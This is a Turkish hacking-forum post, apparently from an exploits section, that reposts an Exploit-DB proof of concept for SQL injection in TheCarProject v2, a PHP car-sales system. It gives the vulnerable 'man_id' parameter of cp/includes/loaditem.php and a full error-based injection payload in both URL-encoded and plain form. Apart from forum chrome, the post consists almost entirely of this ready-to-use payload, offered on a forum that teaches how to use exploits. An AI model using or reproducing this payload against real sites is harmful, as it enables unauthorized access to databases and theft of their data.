İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

TheCarProject v2 - 'man_id' SQL Inj.

18-03-2019 23:50
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
654
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Ticaret:
(0) %
#Exploit Basligi / Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
# Tarih / Date: 17-03-2019
# Exploit Yazar / Exploit Author: Mehmet EMIROGLU
# Yapimci Adresi / Vendor Homepage: https://thecarproject.org/
# Yazilim Linki / Software Link: https://sourceforge.net/projects/thecarproject/
# Versiyon / Version: v2
# Kategori / Category: Webapps
# Test Edilen Sistem / Tested on: Wamp64, Windows
# CVE: N/A
# Yazilim Aciklamasi / Software Description: Galeri sahipleri icin php dilinde yazilmis bir araba satis sistemidir.
Bootstrap 3 ile insa edilmistir.Sinirsiz ürün ve resim eklenebilmektedir. Bu tüm özellikler Admin Panelinden rahatlikla uygulanabilir..



Exploit:

Kod:
 POC - SQLi
# Parametreler: man_id
# Saldiri Türü :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)

# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Exploit Adresi:
https://www.exploit-db.com/exploits/46555
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”
RootAdam Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı